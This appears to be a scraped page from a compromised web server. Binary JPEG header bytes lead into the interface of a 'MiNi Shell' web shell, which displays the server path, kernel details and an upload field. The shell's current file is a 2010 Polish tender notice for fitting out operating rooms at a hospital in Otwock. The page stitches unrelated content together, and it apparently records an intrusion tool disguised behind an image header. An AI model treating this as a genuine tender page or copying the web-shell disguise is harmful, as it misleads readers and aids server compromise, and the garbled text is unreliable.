JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100922/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100922/260101-N-2010.html

<p class="kh_header"><b>Otwock: Wykonanie specjalistycznej zabudowy trzech sal operacyjnych w budynku G Szpitala</b><br>
<b>Numer ogłoszenia: 260101 - 2010; data zamieszczenia: 22.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny im prof. Adama Grucy , ul. Konarskiego 13, 05-400 Otwock, woj. mazowieckie, tel. 022 7794031 w. 477, faks 022 7794031 w. 477.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spskgruca.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie specjalistycznej zabudowy trzech sal operacyjnych w budynku G Szpitala.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie specjalistycznej zabudowy trzech sal operacyjnych w budynku G Szpitala
Zakres robót:
Zakresem zabudowy objęte są 3 sale operacyjne (pomieszczenia G.08.a, G.09.a, G.10.a - według załączonej dokumentacji projektowej

Ogólny zakres zamówienia obejmuje następujące prace:
- Wykonanie dokumentacji technicznej zabudowy pomieszczeń wraz z oświetleniem górnym sal operacyjnych (projekt wykonawczy dla wykonywanej zabudowy i oświetlenia - uzgodniony przez rzeczoznawców branżowych: sanepid, ppoż i bhp) (projekt zostanie zatwierdzony przez zamawiającego w zakresie rozmieszczenia technologicznych otworów montażowych pod przyłącza mediów - gniazda elektryczne, teleinformatyczne oraz punkty poboru gazów medycznych).
- Wykonanie konstrukcji nośnej pod zabudowę, konstrukcja ze stali ocynkowanej gr min 1,25 mm 
- Wykonanie zabudowy ścian panelami ze stali chromowo-niklowej EN 1.4031 (AISI 304) lakierowanymi z powloką poliuretanowową
- Wykonanie technologicznych otworów montażowych pod przyłącza mediów (wykonanie otworów montażowych pod gniazda elektryczne, teleinformatyczne oraz punkty poboru gazów medycznych) 
- Dostawa i montaż drzwi automatycznych ze stali chromowo-niklowej EN 1.4031 (AISI 304) stanowiących wejścia do sal operacyjnych
- Wykonanie zabudowy sufitu podwieszanego ze stali chromowo-niklowej EN 1.4031 (AISI 304) lakierowanej kolor RAL 9010 wraz z oświetleniem górnym sal operacyjnych
- Dostawa oraz montaż opraw oświetleniowych przystosowanych do stosowania w pomieszczeniach czystych ( min IP 65)
- Wykonanie dokumentacji powykonawczej

Sposób wykonania prac

Szczegółowy opis sposobu prowadzenia i wykonania prac zawiera:
1. Dokumentacja projektowa.
2. Specyfikacja techniczna wykonania i odbioru robót.
3. Tabela parametrów wymaganych

Uwaga: zamawiający oczekuje wykonania zabudowy ścian panelami ze stali chromowo-niklowej EN 1.4031 lakierowanymi z powłoką poliuretanową
Wysokość stropu 4m, wysokość zabudowy 3,3m.
Wykonanie zabudowy sufitu podwieszanego ze stali chromowo-niklowej EN 1.4031 (AISI 304) lakierowanej wysokość zabudowy sufitu podwieszanego 3,3m
Wykonania oświetlenia podstawowego sal operacyjnych 
Punkty poboru gazów medycznych zostaną umieszczone na ścianach sal operacyjnych

Kolorystyka ścian zostanie ustalona po podpisaniu umowy w ramach nadzoru inwestorskiego.
Do specyfikacji dołączono dokumentację projektową przebudowy w formacie PDF
Oraz specyfikacje techniczne wykonania i odbioru robót.
Ze względu na konieczność zachowania spójności dokumentacji załączono cały projekt przebudowy budynku G w branży architektury, technologii medycznej oraz instalacji elektrycznej i teletechnicznej. 

Zakres użyteczny dokumentacji wynika natomiast z zakresu robót objętych postępowaniem oraz załączonych opisów prac koniecznych do wykonania.
Wykonawca przez cały okres realizacji robót i w każdym obszarze (rejonie) prowadzonych prac zobowiązany jest tak je organizować i prowadzić, aby ograniczyć do minimum uciążliwości i zagrożenia z tym związane, w szczególności:
- zabezpieczyć teren robót przed dostępem osób postronnych,
- uzgadniać z Zamawiającym odłączanie mediów,
- odpowiednio zabezpieczać teren robót, tak, aby w maksymalnym stopniu ograniczyć
przenoszenie się kurzu i pyłu na pozostałą część obiektu,
- eliminować przyczyny powstawania zbędnego hałasu,
- usuwać na bieżąco i na własny koszt materiały zbędne, odpady i śmieci,
- utrzymywać na bieżąco porządek na terenie robot oraz w bezpośrednim sąsiedztwie i na drogach transportowych,
- transportować materiały, urządzenia, narzędzia itp. w sposób eliminujący zanieczyszczenie i uszkodzenie dróg transportowych,
- niezwłocznie usuwać (na swój koszt) wszelkie awarie powstałe w związku z wykonywaniem robót.

Zamówienie będzie realizowane zgodnie z prawem polskim, w szczególności z ustawą Prawo budowlane. Wykonawca robót budowlanych powinien zapewnić wykonanie robót zgodnie z prawem polskim, w szczególności z przepisami techniczno-budowlanymi, przepisami dotyczącymi samodzielnych funkcji technicznych w budownictwie.

Stosowane materiały

Stosowane materiały powinny posiadać wymagane prawem dokumenty dopuszczające ich stosowanie.
Doboru materiałów należy dokonywać na podstawie odpowiednich dopuszczeń do stosowania w budownictwie oraz założonych projektem wykonawczym warunków technicznych i użytkowych oraz akceptacji Inwestora i nadzoru autorskiego. Wszystkie materiały pierwszego gatunku.
Wszystkie materiały muszą posiadać deklaracje zgodności lub aprobaty techniczne i wymagane atesty.

Gwarancja na roboty i materiał: 
48 miesięcy od końcowego protokołu odbioru na całość.

Zamawiający powoła branżowych Inspektorów Nadzoru do odbioru robót zanikających i odbioru końcowego

Podstawowe Wymagania ogólne w stosunku do Wykonawcy
1.	Zapoznanie się z dokumentacją projektową stanowiącą załącznik do dokumentacji przetargowej
2.	Prace muszą być wykonane pod nadzorem osoby posiadającej odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi lub posiadającej równoważne dokumenty uprawniające do kierowania robotami budowlanymi. 
3.	Rozpoczęcie prac zostanie potwierdzone stosownym protokołem wprowadzenia na budowę
4.	Logistyka prowadzonych robót zostanie zawarta w protokóle wprowadzenia na budowę.
5.	Wykonawca przed rozpoczęciem robót, lecz nie później niż w terminie 3 dni od daty zawarcia umowy, zobowiązany jest przedłożyć Zamawiającemu do akceptacji harmonogram prac.
6.	Wykonawca ponosi pełną odpowiedzialność za przyjęte metody organizacyjne podczas realizacji umowy, z zastrzeżeniem, że muszą one uwzględniać możliwość maksymalnego skrócenia okresu wykonywania tych prac, które spowodują ograniczenie lub wstrzymanie funkcjonowania modernizowanego piętra bloku operacyjnego. 
7.	Wykonawca ponosi pełną odpowiedzialność za zapewnienie warunków bezpieczeństwa oraz za metody organizacyjno-techniczne stosowane na terenie robot, a także za szkody i straty w robotach spowodowane przy usuwaniu wad i usterek w okresie gwarancji i rękojmi.
8.	Zakończenie prac wykonawca potwierdza stosownym zgłoszeniem.
9.	Wykonawca powinien dostarczyć stosowne atesty świadczące o jakości zastosowanych materiałów (przy odbiorze prac)
10.	Do odbioru wymagane jest przedłożenie przez wykonawcę wymaganych umową dokumentów w szczególności:
a)	przedłożenie oświadczenia o zakończeniu prac i gotowości do odbioru
b)	przedłożenie kompletnego dziennika budowy
c)	przedłożenie oświadczenia kierownika budowy o zgodności wykonanych prac z obowiązującymi przepisami i normami
d)	przedłożenie oświadczenia o jakości i dopuszczeniu do użytkowania zastosowanych materiałów wraz ze stosownymi atestami i aprobatami
e)	deklaracji zgodności na wszystkie zastosowane materiały
f)	wykonawca dołączy aprobaty techniczne i atesty na wbudowane materiały, oraz karty gwarancyjne,
g)	przedstawienie dokumentacji powykonawczej
11.	W okresie gwarancji wykonawca zobowiązany jest do wykonywania bezpłatnych okresowych przeglądów gwarancyjnych mających na celu sprawdzenie poprawności wykonania prac i usunięcia zaistniałych usterek. Całkowity koszt przeglądów leży po stronie oferenta.
12.	Częstość przeglądów nie rzadziej niż 1 raz w roku
13.	Wykonawca zobowiązany jest wykonywać roboty z należytą starannością, zgodnie z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robot budowlanych, swoją ofertą, harmonogramem rzeczowo-finansowym oraz z zasadami wiedzy technicznej, sztuką budowlaną, przepisami ppoż i bhp i przepisami prawa budowlanego.
14.	Wykonawca zobowiązany jest zapewnić kompetentne kierownictwo, siłę roboczą, materiały, sprzęt i inne urządzenia oraz wszelkie przedmioty niezbędne do wykonania przedmiotu umowy oraz usunięcia wad i usterek w takim zakresie, w jakim jest to wymienione w dokumentach umownych lub może być logicznie z nich wywnioskowane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 11 600,00 zł słownie: jedenaście tysięcy sześćset złotych. Wykonawca, który nie wniósł wadium, zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.

Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 

Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Pzp
	pieniądzu
	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że 	poręczenie kasy jest zawsze poręczeniem pieniężnym. 
	w gwarancjach bankowych
	w gwarancjach ubezpieczeniowych
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. z 2007 r. Nr 42, poz. 275.

Wadium wnoszone w formie poręczeń i lub gwarancji należy załączyć do oferty w oryginale.

Wpłaty wadium w formie pieniężnej należy dokonać na rachunek bankowy Zamawiającego: Samodzielny Publiczny Szpital Kliniczny im. prof. Adama Grucy, 05-400 Otwock ul. Konarskiego 13, PKO BP XIIO w Otwocku Nr 58 1020 1127 0000 1602 0013 3884 z podaniem w tytule wpłaty numeru sprawy, - SIWZ (DZP/112/2010) Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego

Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli takiego zabezpieczenia żądano.

Zamawiający zatrzyma wadium, jeżeli Wykonawca, którego oferta została wybrana:
	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy

Zamawiający zatrzyma wadium z odsetkami również w sytuacji, gdy w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, Wykonawca nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, ze udowodni, że wynika to z przyczyn nieleżących po jego stronie. 

Zamawiający zwraca wadium wniesione w formie pieniężnej wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Certyfikaty potwierdzające spełnienie parametrów określonych w załączniku nr 5 do siwz
2.	Dokumenty potwierdzające spełnienie norm określonych w załączniku nr 5 do siwz
3.	Karty katalogowe szczegółowe opisane w załączniku nr 5 do siwz
Wymagania dla paneli ściennych wykonanych ze stali nierdzewnej:
a	grubość panelu min 17 mm
b	wykonanie w technologii wielowarstwowej a wykończenie panelu ze stali chromowo-niklowej 
c	panele od strony wewnętrznej usztywniane płytą gipsowo kartonową
d	panel powinien mieć tak wyprofilowane krawędzie aby jego zamocowanie do elementów konstrukcyjnych systemu było niewidoczne,
e	wymagania odnośnie zastosowanego materiału - stal chromowo-niklowa materiał EN 1.4301 AISI 304, grubość blachy min. 1 mm wg DIN 59382 - Wykonawca powinien przedstawić dokument potwierdzający spełnienie normy
f	wysokość pojedynczego panelu musi odpowiadać odległości w świetle sufit podwieszany - posadzka 3,3 m bez łączenia paneli w poziomie wyklucza się wykonanie zabudowy ściany do wysokości sufitu z dwóch paneli łączonych w poziomie,
g	panel lakierowany z powłoką poliuretanową dowolnym kolorem z palety RAL ustalonym w nadzorze inwestorskim,
h	konstrukcja panelu musi umożliwiać późniejszy, łatwy demontaż pojedynczego panelu w celu przeprowadzenia dodatkowych zmian w instalacji i zabudowie,
i	pionowe elementy narożne wklęsłe i wypukłe należy formować z jednego elementu,
j	fugi między panelami wykonać z antybakteryjnej uszczelki hermetycznej dociskowej odpornej na promienie UV, detergenty, środki bakteriobójcze, wodę, parę oraz środki używane do dezynfekcji sal operacyjnych, wyklucza się zastosowanie silikonu jako połączeń między panelami, szerokość połączeń nie więcej niż 6 mm
k	elementy tj. szyby, zegary, panele sterujące, kratki went. itp. należy wmontowywać w powierzchnię panelu w sposób zintegrowany  w sposób tworzący gładką powierzchnię,
l	wyrównanie potencjałów zgodnie z wymaganiami dla sal operacyjnych - wymagane jest doprowadzenie do jednego miejsca zbiorczego wyrównania potencjałów
m	wymagana jest integracja paneli systemowych z modułami recyrkulacyjnymi 
n	Należy dołączyć kartę katalogową oferowanych rozwiązań systemowych paneli ściennych
Wymagania dotyczące konstrukcji nośnej ścian:
a	nośna konstrukcja ścienna umożliwiająca zintegrowanie zabudowy ściennej z modułami recyrkulacyjnymi ściennymi 
b	nośna konstrukcja ścienna wykonana ze stali ocynkowanej gr min 1,25 mm 
c	wysokość konstrukcji nośnej ma być dostosowana do wysokości stropu 4m tak aby wsporniki były montowane do podłogi oraz do stropu. 
d	nośna konstrukcja ścienna wyposażona w dodatkowe wzmocnienia mocujące dla punktów poboru gazów medycznych, oraz do mocowania monitorów i negatoskopów itp. ustalone w nadzorze inwestorskim 
e	wyrównanie potencjałów zgodnie z wymaganiami dla sal operacyjnych - wymagane jest doprowadzenie do jednego miejsca zbiorczego wyrównania potencjałów
f	należy dołączyć kartę katalogową rozwiązań systemowych konstrukcji ściennych
Wymagania dla szyny podłogowej i sufitowej:
a	szyny mają być wykonane z wysokiej jakości stali ocynkowanej, nierdzewnej lub chromoniklowej grubości min. 1,5 mm mocowane do podłoża i stropu,
b	szyna podłogowa ma stanowić podstawę dla wykonania cokołu posadzki licowanego z czołem paneli ściennych
Wykonanie technologicznych otworów montażowych pod przyłącza mediów wykonanie otworów montażowych pod gniazda elektryczne, teleinformatyczne oraz punkty poboru gazów medycznych
Ochrona radiologiczna systemu ściennego równoważnik ołowiu nie mniejszy niż Pb0,3 mm przy 150 kV - należy dołączyć do oferty przetargowej certyfikat jednostki certyfikującej potwierdzający spełnienie parametru
Ścianki systemowe o współczynniku izolacji akustycznej Rw min 42 dB - należy dołączyć do oferty przetargowej certyfikatu jednostki certyfikującej potwierdzającej spełnienie parametru
System zabudowy sufitu i oświetlenie
Wymagania dotyczące paneli sufitowych systemowych:
a	wykonane z wysokiej jakości, lakierowanej RAL 9010 blachy stalowej chromowo-niklowej materiał EN 1.4301 AISI 304
b	zabudowa sufitowa tworzyć musi powierzchnię szczelną i gładką
c	uszczelnienia miedzy panelami wykonać z uszczelek wykluczyć należy zastosowanie połączeń silikonowych.
d	sposób montażu paneli sufitowych musi gwarantować równy poziom płaszczyzny sufitu, a także łatwy demontaż i ponowny montaż pojedynczych kasetonów.
e	połączone do ściany, w sposób szczelny, np. za pomocą szyny przyłączeniowej - profil zamknięty łączący zabudowę ścienną z sufitową.
f	połączenia między zabudową ścienną a sufitową wykonać za pomocą profili systemowych, wykluczyć należy zastosowanie połączeń silikonowych.
g	profil łączeniowy paneli ściennych z panelami sufitowymi z dodatkowymi uszczelkami ma zapewnić całkowitą szczelność systemu 
h	wymagana jest integracja sufitowych paneli systemowych z modułem nawiewu laminarnego 
i	wyrównanie potencjałów zgodnie z wymaganiami dla sal operacyjnych - wymagane jest doprowadzenie do jednego miejsca zbiorczego wyrównania potencjałów
j	należy dołączyć kartę katalogową rozwiązań systemowej zabudowy sufitowej
Wymagania dotyczące nośnej konstrukcji sufitowej:
a	konstrukcja sufitowa ma składać się z profili zapewniających sztywność i szczelność zabudowy panelowej sufitu -wykonana w sposób tworzący stabilną konstrukcję nośną  
b	wszystkie części konstrukcji mają być wykonane z materiału ocynkowanego 
c	konstrukcja systemowa sufitu przystosowana do zintegrowania zabudowy sufitu z nawiewem laminarnym
d	wyrównanie potencjałów zgodnie z wymaganiami dla sal operacyjnych - wymagane jest doprowadzenie do jednego miejsca zbiorczego wyrównania potencjałów
e	należy dołączyć kartę katalogową rozwiązań systemowych konstrukcji sufitowej
System sufitowy wyposażony w szczelne systemowe skrzynki pod montaż opraw oświetleniowych 
 Skrzynki systemowe pod oprawy oświetleniowe wykonane ze stali lakierowanej proszkowo jako dodatkowe uszczelnienie całego sufitu, przygotowane pod montaż opraw oświetleniowych. Powinny być przystosowane do montażu zaoferowanych opraw oświetleniowych. Po montażu opraw oświetleniowych we wnęce skrzynki powinny tworzyć wraz z panelami sufitowymi powierzchnię szczelną i gładką. 
Oprawy oświetleniowe:
a	oprawa do wbudowania w systemowych skrzynkach metalowych systemu sufitowego
b	 przystosowana do pomieszczeń czystych takich jak sale operacyjne wg EN ISO 14644-1 
c	klosz oprawy wykonany jest ze szkła hartowanego 
d	stopień szczelności opraw min IP65.
e	wymiary dostosowane do panelu sufitowego systemowego
f	strumień świetlny zgodnie z opracowanym projektem wykonawczym oświetlenia
g	należy dołączyć do oferty kartę katalogową oferowanych opraw oświetleniowych
Wymagania dotyczące drzwi 
Wymagania dotyczące drzwi przesuwnych z pomieszczeń przygotowania pacjenta na sale operacyjne:
a	drzwi przesuwne ze stali chromowo-niklowej materiał EN 1.4301 AISI 304 
b            skrzydło wykonane w technologii warstwowej odpornej na uderzenie licowane stalą chromowo-niklową materiał EN 1.4301 (AISI 304),
c	grubość skrzydła drzwiowego min 35 mm 
d	skrzydło powinno być wykonane bez jakichkolwiek połączeń na frontowej stronie drzwi
e	na powierzchni czołowej skrzydła powinien być zamontowany gumowy profil uszczelniający  dociskany do zewnętrznej części ościeżnicy, który jednocześnie amortyzuje zamykane drzwi
f       ościeżnica wykonana  ze stali chromowo-niklowej materiał EN 1.4301 AISI 304
g	grubość ościeżnicy min. 2 mm, 
h	ościeżnica zintegrowana z zabudową panelową ścienną, ościeżnica licowana z powierzchnią panelu ściennego
i	ościeżnica powinna być montowana bez widocznych mocowań do ściany,
j	szyna jezdna wyposażona w dodatkowy odbój amortyzujący, 
k	wyrównanie potencjałów zgodnie z wymaganiami dla sal operacyjnych - wymagane jest doprowadzenie do jednego miejsca zbiorczego wyrównania potencjałów
l	konstrukcja skrzydła powinna umożliwiać otwieranie ręczne w przypadku braku zasilania lub awarii automatyki,
m	wszystkie dodatkowe elementy skrzydła okucia, pochwyty itp. wykonane ze stali chromowo-niklowej materiał EN 1.4301 AISI 304,
n	okna obserwacyjne w każdych drzwiach, wymiary okna około 400 x 600 mm, szklone podwójnym szkłem bezpiecznym
o	należy dołączyć do oferty kartę katalogową oferowanych drzwi przesuwnych
Wymagania dla automatyki do drzwi przesuwnych:
a	regulowana szybkość ruchu,
b	płynna regulacja czasu podtrzymania otwarcia skrzydła drzwiowego,
c)	mechanizm powinien umożliwiać otwieranie ręczne w przypadku braku zasilania, 
d)	redukcja prędkości przesuwu drzwi w końcowej fazie zamykania drzwi,
e)	system automatyki zgodny z wymaganiami ppoż w zakresie współpracy z systemem sygnalizacji alarmu pożaru
f)	uruchamianie automatyki drzwiowej powinno następować za pomocą listwy uderzeniowej - zamontowanej na ścianie  lub ościeżnicy drzwi o długości min. 1200 mm. Dotknięcie dowolnej części listwy uderzeniowej powoduje uruchomienie automatyki drzwi. Listwy zamontowane po dwóch stronach drzwi. 
